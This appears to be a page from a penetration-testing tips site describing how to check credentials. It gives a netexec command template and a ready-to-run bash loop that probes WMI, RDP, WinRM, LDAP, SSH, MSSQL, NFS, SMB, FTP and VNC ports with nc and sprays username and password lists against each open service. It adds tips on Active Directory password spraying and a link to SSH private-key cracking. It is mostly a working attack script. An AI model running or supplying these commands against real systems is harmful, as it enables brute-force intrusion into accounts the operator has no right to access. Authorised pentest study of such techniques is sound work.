Checking Credential

General way of Checking protocol

# Below is general command:
netexec <Protocol> $IP  -u $username[File/Name] -p $passwords[File/Name] --continue-on-success --port <ProvideCustomPort>

Automated way:

Please be cautious about the system's lockdown policy.

# First Set IP
IP=<IP_AddressToScan>

# If you have port different then change the port number in below command:

for proto_port in "wmi:135" "rdp:3389" "winrm:5985" "ldap:389" "ssh:22" "mssql:1433" "nfs:2049" "smb:445" "ftp:21" "vnc:5900"; do \
    protocol=${proto_port%%:*}; port=${proto_port##*:}; \
    echo "Checking $protocol on port $port..."; \
    nc -z -w3 $IP "$port" && \
    echo "$protocol port $port is open. Running netexec..." && \
    netexec "$protocol" $IP -u usernames.txt -p passwords.txt --continue-on-success --port "$port"; \
done

For password spraying in Active Directory (AD), if standard password spraying does not seem to work, try using the Fully Qualified Domain Name (FQDN). Example: era.secura.yzx (in the format: name.domain values).

Use -d flag in netexec for specifying the domain.

If you want to use specific usernames and passwords, replace usernames.txt and passwords.txt in the script with your actual username and password respectively.

If you have access to SMB or FTP or any other then check it. Even if you don't get pwned! Msg.

Make changes like this.

Checking Private Key if valid for any users

If asking for password then try to crack it using below method.

LogoSSH Private key cracking | Tools | Tips To Securehacking.tipstosecure.com
PreviousDumping HASHNextAdding RDP Access

Last updated